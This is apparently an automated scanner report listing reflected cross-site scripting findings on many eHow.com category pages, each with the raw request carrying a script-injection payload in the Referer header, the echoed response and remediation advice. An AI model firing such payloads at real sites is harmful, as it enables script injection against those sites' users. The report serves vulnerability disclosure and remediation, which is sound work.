Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=44044</script><script>alert(1)</script>01615995bf6
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:08 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71007
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Electronics - How To Information | eHow.com</titl ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8064d</script><script>alert(1)</script>7e97a32cd8a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /family-health/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8064d</script><script>alert(1)</script>7e97a32cd8a
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:08 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72112
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Family Health - How To Information | eHow.com</ti ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2b8c</script><script>alert(1)</script>0b3ee37394 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fashion-and-style/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c2b8c</script><script>alert(1)</script>0b3ee37394
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:11 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71991
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Fashion & Style - How To Information | eHow.com</ ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12566</script><script>alert(1)</script>82ca7391521 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fitness/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=12566</script><script>alert(1)</script>82ca7391521
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:09 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71749
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Fitness - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ac4</script><script>alert(1)</script>4b44af2fc08 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /flu-season/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d8ac4</script><script>alert(1)</script>4b44af2fc08
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63751
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3116a</script><script>alert(1)</script>90cca8209f8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /food-and-drink/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=3116a</script><script>alert(1)</script>90cca8209f8
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:10 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73304
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Food & Drink - How To Information | eHow.com</tit ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccef8</script><script>alert(1)</script>5bcf79e4aec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forums.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ccef8</script><script>alert(1)</script>5bcf79e4aec
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:29 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22442
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ddff</script><script>alert(1)</script>7de5c8273d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /groups.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=5ddff</script><script>alert(1)</script>7de5c8273d8
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:23 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22896
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abdc2</script><script>alert(1)</script>26163dc8dc4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /healthcare/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=abdc2</script><script>alert(1)</script>26163dc8dc4
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71315

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Healthcare - How To Information | eHow.com</title ...[SNIP]...
obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d42a7</script><script>alert(1)</script>0fa77f5b04 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /healthy-living/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d42a7</script><script>alert(1)</script>0fa77f5b04
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71896

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Healthy Living - How To Information | eHow.com</t ...[SNIP]...
obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc77a</script><script>alert(1)</script>a68361c09e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hobbies-and-science/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=dc77a</script><script>alert(1)</script>a68361c09e5
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72434

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Hobbies & Science - How To Information | eHow.com ...[SNIP]...
obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ba25</script><script>alert(1)</script>b5ee88d9cea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /holidays-and-celebrations/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=5ba25</script><script>alert(1)</script>b5ee88d9cea
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73341

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Holidays & Celebrations - How To Information | eH ...[SNIP]...
obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f166c</script><script>alert(1)</script>a4a00c14a49 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-building-and-remodeling/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=f166c</script><script>alert(1)</script>a4a00c14a49
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72269

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Home Building & Remodeling - How To Information | ...[SNIP]...
obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3f72</script><script>alert(1)</script>a019290626d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-design-and-decorating/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=f3f72</script><script>alert(1)</script>a019290626d
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72787

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Home Design & Decorating - How To Information | e ...[SNIP]...
obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4071d</script><script>alert(1)</script>3ff02b2dbf8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-maintenance-and-repair/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=4071d</script><script>alert(1)</script>3ff02b2dbf8
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73460

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Home Maintenance & Repair - How To Information | ...[SNIP]...
obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee49f</script><script>alert(1)</script>99509508ba4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-safety-and-household-tips/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ee49f</script><script>alert(1)</script>99509508ba4
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70626

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Home Safety & Household Tips - How To Information ...[SNIP]...
obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f883b</script><script>alert(1)</script>f66a86dc852 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-security-alarm/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
